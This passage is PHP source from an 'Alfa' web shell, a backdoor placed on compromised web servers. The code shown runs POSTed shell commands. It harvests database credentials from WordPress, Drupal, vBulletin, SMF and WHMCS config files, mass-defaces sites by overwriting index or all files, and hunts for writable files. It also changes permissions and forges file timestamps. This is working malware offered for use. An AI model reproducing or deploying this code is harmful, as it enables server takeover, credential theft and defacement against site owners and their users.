]{0,}array|db_name|db_user|db_pass|db_server|db_host|dbhost|dbname|dbuser|dbpass|database_name|database_user|database_pass|mysql_user|mysql_pass|mysqli_connect|mysql_connect|new[ ]{0,}mysqli#i";\r\n\t$db_files = array("wp-config.php","configure.php","config.inc.php","configuration.php","config.php","conf.php","dbclass.php","class_core.php","dist-configure.php", "settings.php", "conf_global.php", "db.php", "connect.php", "confing.db.php", "config.db.php", "database.php");\r\n\tif(@is_readable($dir)){\r\n\t\t$globFiles = @glob("$dir/*.$ext");\r\n\t\t$globDirs  = @glob("$dir/*", GLOB_ONLYDIR);\r\n\t\t$blacklist = array();\r\n\t\tforeach ($globDirs as $dir) {\r\n\t\t\tif(!@is_readable($dir)||@is_link($dir)) continue;\r\n\t\t\t@Alfa_ConfigGrabber($dir, $ext);\r\n\t\t}\r\n\t\tforeach ($globFiles as $file){\r\n\t\t\t$filee = @file_get_contents($file);\r\n\t\t\tif(preg_match($pattern, $filee)){\r\n\t\t\t\techo "<div><span>$file</span> <a style=\'cursor:pointer;\' onclick=\\"editor(\'".$file."\',\'auto\',\'\',\'\',\'\',\'file\');\\">[ View file ]</a></div>";\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\nfunction alfasearcher(){\r\nalfahead();\r\necho \'<div class=header><center><p><div class="txtfont_header">| Searcher |</div></p><h3><a href=javascript:void(0) onclick="g(\\\'searcher\\\',null,\\\'file\\\')">| Find Readable Or Writable Files | </a><a href=javascript:void(0) onclick="g(\\\'searcher\\\',null,\\\'str\\\')">| Find Files By Name | </a></h3></center>\';\r\nif(isset($_POST[\'alfa1\'])&&$_POST[\'alfa1\']==\'file\'){\r\necho \'<center><div class="txtfont_header">| Find Readable Or Writable Files  |</div><br><br><form name="srch" onSubmit="g(\\\'searcher\\\',null,\\\'file\\\',this.filename.value,this.ext.value,this.method.value,\\\'>>\\\');return false;" method=\\\'post\\\'>\r\n<div class="txtfont">\r\nMethod: <select style="width: 18%;" onclick="alfa_searcher_tool(this.value);" name="method"><option value="files">Find All Writable Files</option><option value="dirs">Find All Writable Dirs</option><option value="all">Find All Readable And Writable Files</option></select>\r\nDir: <input size="50" id="target" type="text" name="filename" value="\'.$GLOBALS[\'cwd\'].\'">\r\nExt: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">\r\n<input type="submit" name="btn" value=" "></div></form></center><br>\';\r\n$dir = $_POST[\'alfa2\'];\r\n$ext = $_POST[\'alfa3\'];\r\n$method = $_POST[\'alfa4\'];\r\nif($_POST[\'alfa5\']==\'>>\'){\r\necho __pre();\r\nif(substr($dir,-1)==\'/\')$dir=substr($dir,0,-1);\r\nAlfa_Searcher($dir,trim($ext),$method);\r\n}\r\n}\r\nif($_POST[\'alfa1\']==\'str\'){\r\necho \'<center><div class="txtfont_header">| Find Files By Name / Find String In Files |</div><br><br><form onSubmit="g(\\\'searcher\\\',null,\\\'str\\\',this.dir.value,this.string.value,\\\'>>\\\',this.ext.value,this.method.value);return false;" method=\\\'post\\\'>\r\n<div class="txtfont">\r\nMethod: <select name="method"><option value="name">Find Files By Name</option><option value="str">Find String In Files</option></select>\r\nString: <input type="text" name="string" value="">\r\nDir: <input size="50" type="text" name="dir" value="\'.$GLOBALS[\'cwd\'].\'">\r\nExt: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">\r\n<input type="submit" name="btn" value=" "></div></form></center><br>\';\r\n$dir = $_POST[\'alfa2\'];\r\n$string = $_POST[\'alfa3\'];\r\n$ext = $_POST[\'alfa5\'];\r\nif(!empty($string) AND !empty($dir) AND $_POST[\'alfa4\'] == \'>>\'){\r\necho __pre();\r\nAlfa_StrSearcher($dir,$string,$ext,$_POST[\'alfa6\']);\r\n}\r\n}\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction alfaMassDefacer(){\r\nalfahead();\r\nAlfaNum(5,6,7,8,9,10);\r\necho "<div class=header><center><p><div class=\'txtfont_header\'>| Mass Defacer |</div></p><form onSubmit=\\"g(\'MassDefacer\',null,this.massdir.value,this.defpage.value,this.method.value,\'>>\');return false;\\" method=\'post\'>";\r\necho \'<div class="txtfont">Deface Method: <select name="method"><option value="index">Deface Index Dirs</option><option value="all">All Files</option></select>\r\n\tMass dir: <input size="50" id="target" type="text" name="massdir" value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n\tDefPage: <input size="50" type="text" name="defpage" value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'"></div> <input type="submit" name="btn" value=" "></center></p>\r\n</form>\';\r\n$dir = $_POST[\'alfa1\'];\r\n$defpage = $_POST[\'alfa2\'];\r\n$method = $_POST[\'alfa3\'];\r\n$fCurrent = $GLOBALS[\'__file_path\'];\r\nif($_POST[\'alfa4\'] == \'>>\'){\r\nif(!empty($dir)){\r\nif(@is_dir($dir)){\r\nif(@is_readable($dir)){\r\nif(@is_file($defpage)){\r\nif($dh = @opendir($dir)){\r\necho __pre();\r\nwhile (($file = @readdir($dh)) !== false){\r\nif($file == \'..\' || $file == \'.\')continue;\r\n$newfile=$dir.$file;\r\nif($fCurrent == $newfile)continue;\r\nif(@is_dir($newfile)){\r\nAlfa_ReadDir($newfile,$method,$defpage);\r\n}else{\r\nif(!@is_writable($newfile))continue;\r\nif(!@is_readable($newfile))continue;\r\nAlfa_Rewriter($newfile,$file,$defpage,$method);\r\n}\r\n}\r\nclosedir($dh);\r\n}else{__alert(\'<font color="red">Error In OpenDir...</font>\');}\r\n}else{__alert(\'<font color="red">DefPage File NotFound...</font>\');}\r\n}else{__alert(\'<font color="red">Directory is not Readable...</font>\');}\r\n}else{__alert(\'<font color="red">Mass Dir is Invalid Dir...</font>\');}\r\n}else{__alert(\'<font color="red">Dir is Empty...</font>\');}\r\n}\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction Alfa_ReadDir($dir,$method=\'\',$defpage=\'\'){\r\nif(!@is_readable($dir)) return false;\r\nif (@is_dir($dir)) {\r\nif ($dh = @opendir($dir)) {\r\nwhile(($file=readdir($dh))!==false) {\r\nif($file == \'..\' || $file == \'.\')continue;\r\n$newfile=$dir.\'/\'.$file;\r\nif(@is_readable($newfile)&&@is_dir($newfile))Alfa_ReadDir($newfile,$method,$defpage);\r\nif(@is_file($newfile)){\r\nif(!@is_readable($newfile))continue;\r\nAlfa_Rewriter($newfile,$file,$defpage,$method);\r\n}\r\n}\r\nclosedir($dh);\r\n}\r\n}\r\n}\r\nfunction Alfa_Rewriter($dir,$file,$defpage,$m=\'index\'){\r\nif(!@is_writable($dir)) return false;\r\nif(!@is_readable($dir)) return false;\r\n$defpage=@file_get_contents($defpage);\r\nif($m == \'index\'){\r\n$indexs = array(\'index.php\',\'index.htm\',\'index.html\',\'default.asp\',\'default.aspx\',\'index.asp\',\'index.aspx\',\'index.js\');\r\nif(in_array(strtolower($file),$indexs)){\r\n@file_put_contents($dir,$defpage);\r\necho @is_file($dir)?$dir."<b><font color=\'red\'>DeFaced...</b></font><br>" : \'\';\r\n}\r\n}elseif($m==\'all\'){\r\n@file_put_contents($dir,$defpage);\r\necho @is_file($dir)?$dir."  <b><font color=\'red\'>DeFaced...</b></font><br>" : \'\';\r\n}\r\n}\r\nfunction alfaGetDisFunc(){\r\nalfahead();\r\necho \'<div class="header">\';\r\n$disfun = @ini_get(\'disable_functions\');\r\n$s = explode(\',\',$disfun);\r\n$f = array_unique($s);\r\necho \'<center><br><b><font color="#7CFC00">Disable Functions</font></b><pre><table border="1"><tr><td align="center" style="background-color: green;color: white;width:5%">#</td><td align="center" style="background-color: green;color: white;">Func Name</td></tr>\';\r\n$i=1;\r\nforeach($f as $s){\r\n$s=trim($s);\r\nif(function_exists($s)||!is_callable($s))continue;\r\necho \'<tr><td align="center" style="background-color: black;">\'.$i.\'</td>\';\r\necho \'<td align="center" style="background-color: black;"><a style="text-decoration: none;" target="_blank" href="http://php.net/manual/en/function.\'.str_replace(\'_\',\'-\',$s).\'.php"><span class="disable_functions"><b>\'.$s.\'</b></span></a></td>\';\r\n$i++;\r\n}\r\necho \'</table></center>\';\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction Alfa_Create_A_Tag($action,$vals){\r\n$nulls = array();\r\nforeach($vals as $key => $val){\r\necho \'<a href=javascript:void(0) onclick="g(\\\'\'.$action.\'\\\',\';\r\nfor($i=1;$i<=$val[1]-1;$i++)$nulls[] = \'null\';\r\n$f = implode(\',\',$nulls);\r\necho $f.\',\\\'\'.$val[0].\'\\\');return false;">| \'.$key.\' | </a>\';\r\nunset($nulls);\r\n}\r\n}\r\nfunction Alfa_Searcher($dir, $ext, $method) {\r\nif(@is_readable($dir)){\r\nif($method == \'all\')$ext = \'*\';\r\nif($method == \'dirs\')$ext = \'*\';\r\n$globFiles = @glob("$dir/*.$ext");\r\n$globDirs  = @glob("$dir/*", GLOB_ONLYDIR);\r\n$blacklist = array();\r\nforeach ($globDirs as $dir) {\r\nif(!@is_readable($dir)||@is_link($dir)) continue;\r\n@Alfa_Searcher($dir, $ext, $method);\r\n}\r\nswitch($method){\r\ncase "files":\r\nforeach ($globFiles as $file){\r\nif(@is_writable($file)){\r\necho "$file<br>";\r\n}\r\n}\r\nbreak;\r\ncase "dirs":\r\nforeach ($globFiles as $file){\r\nif(@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)){\r\necho dirname($file).\'<br>\';\r\n$blacklist[] = dirname($file);\r\n}\r\n}\r\nbreak;\r\ncase "all":\r\nforeach ($globFiles as $file){\r\necho $file.\'<br>\';\r\n}\r\nbreak;\r\n}\r\nunset($blacklist);\r\n}\r\n}\r\nfunction AlfaiFrameCreator($f,$width=\'100%\',$height=\'600px\'){\r\nreturn(\'<iframe src="\'.__ALFA_DATA_FOLDER__."/".$f.\'" width="\'.$width.\'" height="\'.$height.\'" frameborder="0"></iframe>\');\r\n}\r\nclass AlfaCURL {\r\npublic $headers;\r\npublic $user_agent;\r\npublic $compression;\r\npublic $cookie_file;\r\npublic $proxy;\r\npublic $path;\r\npublic $ssl = true;\r\npublic $curl_status = true;\r\nfunction __construct($cookies=false,$compression=\'gzip\',$proxy=\'\'){\r\nif(!extension_loaded(\'curl\')){$curl_status = false;return false;}\r\n$this->headers[] = \'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg\';\r\n$this->headers[] = \'Connection: Keep-Alive\';\r\n$this->headers[] = \'Content-type: application/x-www-form-urlencoded;charset=UTF-8\';\r\n$this->user_agent = \'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36)\';\r\n$this->path = ALFA_TEMPDIR.\'/Alfa_cookies.txt\';\r\n$this->compression=$compression;\r\n$this->proxy=$proxy;\r\n$this->cookies=$cookies;\r\nif($this->cookies)$this->cookie($this->path);\r\n}\r\nfunction cookie($cookie_file) {\r\nif (_alfa_file_exists($cookie_file,false)) {\r\n$this->cookie_file=$cookie_file;\r\n}else{\r\n@fopen($cookie_file,\'w\') or die($this->error(\'The cookie file could not be opened.\'));\r\n$this->cookie_file=$cookie_file;\r\n@fclose($this->cookie_file);\r\n}\r\n}\r\nfunction Send($url,$method="get",$data=""){\r\nif(!$this->curl_status){return false;}\r\n$process = curl_init($url);\r\ncurl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);\r\ncurl_setopt($process, CURLOPT_HEADER, 0);\r\ncurl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);\r\ncurl_setopt($process, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($process, CURLOPT_ENCODING , $this->compression);\r\ncurl_setopt($process, CURLOPT_TIMEOUT, 30);\r\nif($this->ssl){\r\ncurl_setopt($process, CURLOPT_SSL_VERIFYPEER ,false);\r\ncurl_setopt($process, CURLOPT_SSL_VERIFYHOST,false);\r\n}\r\nif($this->cookies){\r\ncurl_setopt($process, CURLOPT_COOKIEFILE, $this->path);\r\ncurl_setopt($process, CURLOPT_COOKIEJAR, $this->path);\r\n}\r\nif($this->proxy){\r\ncurl_setopt($process, CURLOPT_PROXY, $this->proxy);\r\n}\r\nif($method==\'post\'){\r\ncurl_setopt($process, CURLOPT_POSTFIELDS, $data);\r\ncurl_setopt($process, CURLOPT_POST, 1);\r\ncurl_setopt($process, CURLOPT_HTTPHEADER, array(\'Content-Type: application/x-www-form-urlencoded\'));\r\n}\r\n$return = @curl_exec($process);\r\ncurl_close($process);\r\nreturn $return;\r\n}\r\nfunction error($error) {\r\necho "<center><div style=\'width:500px;border: 3px solid #FFEEFF; padding: 3px; background-color: #FFDDFF;font-family: verdana; font-size: 10px\'><b>cURL Error</b><br>$error</div></center>";\r\ndie;\r\n}\r\n}\r\nfunction getConfigHtml($cms){\r\n$content = \'\';\r\n$cms_array = array("wp" => "WordPress", "vb" => "vBulletin", "whmcs" => "Whmcs", "joomla" => "Joomla", "phpnuke" => "PHPNuke","phpbb"=>"PHPBB","mybb"=>"MyBB","drupal"=>"Drupal","smf"=>"SMF");\r\n$content .= "<form class=\'getconfig\' onSubmit=\'g(\\"GetConfig\\",null,this.cms.value,this.path.value,this.getAttribute(\\"base_id\\"));return false;\'><div class=\'txtfont\'>Cms: </div> <select name=\'cms\'style=\'width:100px;\'>";\r\nforeach($cms_array as $key => $val){\r\n$content .= "<option value=\'{$key}\' ".($key==$cms?\'selected=selected\':\'\').">{$val}</option>";\r\n}\r\n$content .= "</select> <div class=\'txtfont\'>Path(installed cms/Config): </div> <input type=\'text\' name=\'path\' value=\'".$_SERVER[\'DOCUMENT_ROOT\']."/\' size=\'30\' /> <button class=\'button\'>GetConfig</button>";\r\n$content .= "</form>";\r\nreturn $content;\r\n}\r\nif (!function_exists(\'json_encode\')){\r\n    function json_encode($a=false){\r\n        if (is_null($a)) return \'null\';\r\n        if ($a === false) return \'false\';\r\n        if ($a === true) return \'true\';\r\n        if (is_scalar($a))\r\n        {\r\n            if (is_float($a))\r\n            {\r\n                return floatval(str_replace(",", ".", strval($a)));\r\n            }\r\n\r\n            if (is_string($a))\r\n            {\r\n                static $jsonReplaces = array(array("\\\\", "/", "\\n", "\\t", "\\r", "\\b", "\\f", \'"\'), array(\'\\\\\\\\\', \'\\\\/\', \'\\\\n\', \'\\\\t\', \'\\\\r\', \'\\\\b\', \'\\\\f\', \'\\"\'));\r\n                return \'"\' . str_replace($jsonReplaces[0], $jsonReplaces[1], $a) . \'"\';\r\n            }\r\n            else\r\n            return $a;\r\n        }\r\n        $isList = true;\r\n        for ($i = 0, reset($a); $i < count($a); $i++, next($a))\r\n        {\r\n            if (key($a) !== $i)\r\n            {\r\n                $isList = false;\r\n                break;\r\n            }\r\n        }\r\n        $result = array();\r\n        if ($isList)\r\n        {\r\n            foreach ($a as $v) $result[] = json_encode($v);\r\n            return \'[\' . join(\',\', $result) . \']\';\r\n        }\r\n        else\r\n        {\r\n            foreach ($a as $k => $v) $result[] = json_encode($k).\':\'.json_encode($v);\r\n            return \'{\' . join(\',\', $result) . \'}\';\r\n        }\r\n    }\r\n}\r\nif ( !function_exists(\'json_decode\') ){\r\nfunction json_decode($json, $array=true){\r\n    $comment = false;\r\n    $out = \'$x=\';\r\n    for ($i=0; $i<strlen($json); $i++)\r\n    {\r\n        if (!$comment)\r\n        {\r\n            if ($json[$i] == \'{\' || $json[$i] == \'[\'){$out .= \' array(\';}\r\n            else if ($json[$i] == \'}\' || $json[$i] == \']\'){$out .= \')\';}\r\n            else if ($json[$i] == \':\'){$out .= \'=>\';}\r\n            else {$out .= $json[$i];}\r\n        }\r\n        else $out .= $json[$i];\r\n        if ($json[$i] == \'"\')    $comment = !$comment;\r\n    }\r\n    eval($out . \';\');\r\n    return $x;\r\n}\r\n}\r\nfunction alfaterminalExec(){\r\n\t$pwd = "pwd";\r\n\t$seperator = ";";\r\n\tif($GLOBALS[\'sys\']!=\'unix\'){\r\n\t\t$pwd = "cd";\r\n\t\t$seperator = "&";\r\n\t}\r\n\tif($GLOBALS["glob_chdir_false"]&&!empty($_POST["c"])){$cmd = "cd \'".addslashes($_POST["c"])."\'".$seperator;}\r\n\t$current_path = \'\';\r\n\tif(preg_match("/cd[ ]{0,}(.*)[ ]{0,}".$seperator."|cd[ ]{0,}(.*)[ ]{0,}/i", $_POST[\'alfa1\'], $match)){\r\n\t\tif(empty($match[1])){\r\n\t\t\t$match[1] = $match[2];\r\n\t\t}\r\n\t\t$current_path = alfaEx("cd ".addslashes($match[1]).$seperator.$pwd);\r\n\t\t$current_path = str_replace("\\\\", "/", $current_path);\r\n\t}\r\n\t$out = alfaEx($cmd.$_POST[\'alfa1\'], true);\r\n\t$out = htmlspecialchars($out);\r\n\techo json_encode(array("output" => convertBash($out), "path" => $current_path));\r\n}\r\nfunction convertBash($code) {\r\n    $dictionary = array(\r\n        \'[01;30m\' => \'<span style="color:black">\',\r\n        \'[01;31m\' => \'<span style="color:red">\',\r\n        \'[01;32m\' => \'<span style="color:green">\',\r\n        \'[01;33m\' => \'<span style="color:yellow">\',\r\n        \'[01;34m\' => \'<span style="color:blue">\',\r\n        \'[01;35m\' => \'<span style="color:purple">\',\r\n        \'[01;36m\' => \'<span style="color:cyan">\',\r\n        \'[01;37m\' => \'<span style="color:white">\',\r\n        \'[0m\'   => \'</span>\'\r\n    );\r\n    $htmlString = str_replace(array_keys($dictionary), $dictionary, $code);\r\n    return $htmlString;\r\n}\r\nfunction alfadoActions(){\r\n\t$chdir_fals = false;\r\n\tif(!@chdir($_POST[\'c\'])){\r\n\t\t$chdir_fals = true;\r\n\t\t$alfa_canruncmd = _alfa_can_runCommand(true,true);\r\n\t}\r\n\tif(isset($_POST[\'alfa1\']))$_POST[\'alfa1\'] = rawurldecode($_POST[\'alfa1\']);\r\n\tif(isset($_POST[\'alfa2\']))$_POST[\'alfa2\'] = rawurldecode($_POST[\'alfa2\']);\r\n\t$action = $_POST["alfa3"];\r\n\tif($action == "permission"){\r\n\t\t$perms = 0;\r\n\t\t$perm = $_POST["alfa2"];\r\n\t\tfor($i=strlen($perm)-1;$i>=0;--$i){\r\n\t\t\t$perms += (int)$perm[$i]*pow(8, (strlen($perm)-$i-1));\r\n\t\t}\r\n\t\tif(@chmod($_POST[\'alfa1\'], $perms)){\r\n\t\t\techo("done");\r\n\t\t}else{\r\n\t\t\techo("no");\r\n\t\t}\r\n\t\treturn;\r\n\t}\r\n\tif($action == "rename" || $action == "move"){\r\n\t\t$alfa1_decoded = $_POST[\'alfa1\'];\r\n\t\tif($chdir_fals){\r\n\t\t\t$_POST[\'alfa1\'] = $_POST["c"]."/".$_POST["alfa1"];\r\n\t\t}\r\n\t\t$_POST[\'alfa1\'] = trim($_POST[\'alfa1\']);\r\n\t\t$alfa1_escape = addslashes($_POST["alfa1"]);\r\n\t\tif($_POST["alfa3"] == "rename"){\r\n\t\t\t$_POST[\'alfa2\'] = basename($_POST[\'alfa2\']);\r\n\t\t}\r\n\t\tif(!empty($_POST[\'alfa2\'])){\r\n\t\t\t$cmd_rename = false;\r\n\t\t\tif($chdir_fals&&$alfa_canruncmd){\r\n\t\t\t\tif(_alfa_is_writable($_POST[\'alfa1\'])){\r\n\t\t\t\t\t$cmd_rename = true;\r\n\t\t\t\t\t$alfa1_escape = addslashes($alfa1_decoded);\r\n\t\t\t\t\talfaEx("cd \'".addslashes($_POST[\'c\'])."\';mv \'".$alfa1_escape."\' \'".addslashes($_POST[\'alfa2\'])."\'");\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tif(!file_exists($_POST[\'alfa2\'])){\r\n\t\t\t\tif(@rename($_POST[\'alfa1\'], $_POST[\'alfa2\'])||$cmd_rename){\r\n\t\t\t\t\techo "done";\r\n\t\t\t\t}else{\r\n\t\t\t\t\techo "no";\r\n\t\t\t\t}\r\n\t\t\t}else{\r\n\t\t\t\techo "no";\r\n\t\t\t}\r\n\t\t}\r\n\t}elseif($action == "copy"){\r\n\t\tif(is_dir($_POST["alfa1"])){\r\n\t\t\t$dir = str_replace(\'//\', \'/\', $_POST["alfa1"]);\r\n\t\t\t$dir = explode(\'/\', $dir);\r\n\t\t\tif(empty($dir[count($dir) - 1])){\r\n\t\t\t\t$name = $dir[count($dir) - 2];\r\n\t\t\t}else{\r\n\t\t\t\t$name = $dir[count($dir) - 1];\r\n\t\t\t}\r\n\t\t}else{\r\n\t\t\t$name = basename($_POST["alfa1"]);\r\n\t\t}\r\n\t\t$dir = dirname($_POST["alfa1"]);\r\n\t\tif($dir == "."){\r\n\t\t\t$dir = $_POST["c"]."/";\r\n\t\t}\r\n\t\tif(is_file($_POST["alfa1"])){\r\n\t\t\t@copy($_POST["alfa1"], $_POST["alfa2"]);\r\n\t\t\techo("done");\r\n\t\t}elseif(is_dir($_POST["alfa1"])){\r\n\t\t\tif(!is_dir($_POST["alfa2"])){\r\n\t\t\t\tmkdir($_POST["alfa2"], 0755, true);\r\n\t\t\t}\r\n\t\t\tcopy_paste($dir, $name , $_POST["alfa2"] . "/");\r\n\t\t\techo("done");\r\n\t\t}\r\n\t}elseif($action == "modify"){\r\n\t\tif( !empty($_POST[\'alfa1\']) ) {\r\n\t\t\t$time = strtotime($_POST[\'alfa1\']);\r\n\t\t\tif($time){\r\n\t\t\t\t$touched = false;\r\n\t\t\t\tif($chdir_fals&&$alfa_canruncmd){\r\n\t\t\t\t\talfaEx("cd \'".addslashes($_POST["c"])."\';touch -d \'".htmlspecialchars(addslashes($_POST[\'alfa1\']))."\' \'".addslashes($_POST[\'alfa2\'])."\'");\r\n\t\t\t\t\t$touched = true;\r\n\t\t\t\t}\r\n\t\t\t\tif(!@touch($_POST[\'alfa2\'],$time,$time)&&!$touched){\r\n\t\t\t\t\techo \'no\';\r\n\t\t\t\t}else{\r\n\t\t\t\t\techo \'ok\';\r\n\t\t\t\t}\r\n\t\t\t} else{\r\n\t\t\t\t echo \'badtime\';\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\r\n}\r\nfunction alfaget_flags(){\r\n\t$flags = array();\r\n\tif(function_exists("curl_version")){\r\n\t\t$curl = new AlfaCURL();\r\n\t\t$server_addr = (!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER[\'SERVER_NAME\']):\'????\'):@$_SERVER["SERVER_ADDR"]);\r\n\t\t$flag = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $server_addr);\r\n\t\t$flag2 = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $_SERVER["REMOTE_ADDR"]);\r\n\t\tif(strpos($flag2, "geoplugin") != false){\r\n\t\t\t$flag = json_decode($flag, true);\r\n\t\t\t$flag2 = json_decode($flag2, true);\r\n\t\t\tif(!empty($flag[\'geoplugin_countryCode\'])){\r\n\t\t\t\t$flags["server"]["name"] = $flag[\'geoplugin_countryName\'];\r\n\t\t\t\t$flags["server"]["code"] = $flag[\'geoplugin_countryCode\'];\r\n\t\t\t}\r\n\t\t\tif(!empty($flag2[\'geoplugin_countryCode\'])){\r\n\t\t\t\t$flags["client"]["name"] = $flag2[\'geoplugin_countryName\'];\r\n\t\t\t\t$flags["client"]["code"] = $flag2[\'geoplugin_countryCode\'];\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\techo json_encode($flags);\r\n}\r\nfunction alfaGetConfig(){\r\n$cms = $_POST[\'alfa1\'];\r\n$path = trim($_POST[\'alfa2\']);\r\n$config = array(\r\n\'wp\'=>array(\'file\'=>\'/wp-config.php\',\r\n\'host\'=>array("/define[ ]{0,}\\([ ]{0,}(?:\'|\\")DB_HOST(?:\'|\\")[ ]{0,},[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,}\\)[ ]{0,};/",1),\r\n\'dbname\'=>array("/define[ ]{0,}\\([ ]{0,}(?:\'|\\")DB_NAME(?:\'|\\")[ ]{0,},[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,}\\)[ ]{0,};/",1),\r\n\'dbuser\'=>array("/define[ ]{0,}\\([ ]{0,}(?:\'|\\")DB_USER(?:\'|\\")[ ]{0,},[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,}\\)[ ]{0,};/",1),\r\n\'dbpw\'=>array("/define[ ]{0,}\\([ ]{0,}(?:\'|\\")DB_PASSWORD(?:\'|\\")[ ]{0,},[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,}\\)[ ]{0,};/",1),\r\n\'prefix\'=>array("/table_prefix[ ]{0,}=[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,};/",1)\r\n),\r\n\'drupal\'=>array(\'file\'=>\'/config.php\',\r\n\'host\'=>array("/define[ ]{0,}\\([ ]{0,}(?:\'|\\")DB_HOSTNAME(?:\'|\\")[ ]{0,},[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,}\\)[ ]{0,};/",1),\r\n\'dbname\'=>array("/define[ ]{0,}\\([ ]{0,}(?:\'|\\")DB_DATABASE(?:\'|\\")[ ]{0,},[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,}\\)[ ]{0,};/",1),\r\n\'dbuser\'=>array("/define[ ]{0,}\\([ ]{0,}(?:\'|\\")DB_USERNAME(?:\'|\\")[ ]{0,},[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,}\\)[ ]{0,};/",1),\r\n\'dbpw\'=>array("/define[ ]{0,}\\([ ]{0,}(?:\'|\\")DB_PASSWORD(?:\'|\\")[ ]{0,},[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,}\\)[ ]{0,};/",1),\r\n\'prefix\'=>array("/define[ ]{0,}\\([ ]{0,}(?:\'|\\")DB_PREFIX(?:\'|\\")[ ]{0,},[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,}\\)[ ]{0,};/",1)\r\n),\r\n\'drupal2\'=>array(\'file\'=>\'/sites/default/settings.php\',\r\n\'host\'=>array("/(?:\'|\\")host(?:\'|\\")[ ]{0,}=>[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,},/",1),\r\n\'dbname\'=>array("/(?:\'|\\")database(?:\'|\\")[ ]{0,}=>[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,},/",1),\r\n\'dbuser\'=>array("/(?:\'|\\")username(?:\'|\\")[ ]{0,}=>[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,},/",1),\r\n\'dbpw\'=>array("/(?:\'|\\")password(?:\'|\\")[ ]{0,}=>[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,},/",1),\r\n\'prefix\'=>array("/(?:\'|\\")prefix(?:\'|\\")[ ]{0,}=>[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,},/",1)\r\n),\r\n\'vb\'=>array(\'file\'=>\'/includes/config.php\',\r\n\'host\'=>array("/config\\[(?:\'|\\")MasterServer(?:\'|\\")\\]\\[(?:\'|\\")servername(?:\'|\\")\\](\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,};/",3),\r\n\'dbuser\'=>array("/config\\[(?:\'|\\")MasterServer(?:\'|\\")\\]\\[(?:\'|\\")username(?:\'|\\")\\](\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,};/",3),\r\n\'dbname\'=>array("/config\\[(?:\'|\\")Database(?:\'|\\")\\]\\[(?:\'|\\")dbname(?:\'|\\")\\](\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,};/",3),\r\n\'dbpw\'=>array("/config\\[(?:\'|\\")MasterServer(?:\'|\\")\\]\\[(?:\'|\\")password(?:\'|\\")\\](\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,};/",3),\r\n\'prefix\'=>array("/config\\[(?:\'|\\")Database(?:\'|\\")\\]\\[(?:\'|\\")tableprefix(?:\'|\\")\\](\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\")[ ]{0,};/",3)\r\n),\r\n\'phpnuke\'=>array(\'file\'=>\'/config.php\',\r\n\'host\'=>array(\'/dbhost(\\s+)=(\\s+)(?:\\\'|")(.*?)(?:\\\'|");/\',3),\r\n\'dbname\'=>array(\'/dbname(\\s+)=(\\s+)(?:\\\'|")(.*?)(?:\\\'|");/\',3),\r\n\'dbuser\'=>array(\'/dbuname(\\s+)=(\\s+)(?:\\\'|")(.*?)(?:\\\'|");/\',3),\r\n\'dbpw\'=>array(\'/dbpass(\\s+)=(\\s+)(?:\\\'|")(.*?)(?:\\\'|");/\',3),\r\n\'prefix\'=>array(\'/prefix(\\s+)=(\\s+)(?:\\\'|")(.*?)(?:\\\'|");/\',3)\r\n),\r\n\'smf\'=>array(\'file\'=>\'/Settings.php\',\r\n\'host\'=>array("/db_server(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbname\'=>array("/db_name(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbuser\'=>array("/db_user(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbpw\'=>array("/db_passwd(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'prefix\'=>array("/db_prefix(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3)\r\n),\r\n\'whmcs\'=>array(\'file\'=>\'/configuration.php\',\r\n\'host\'=>array("/db_host(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbname\'=>array("/db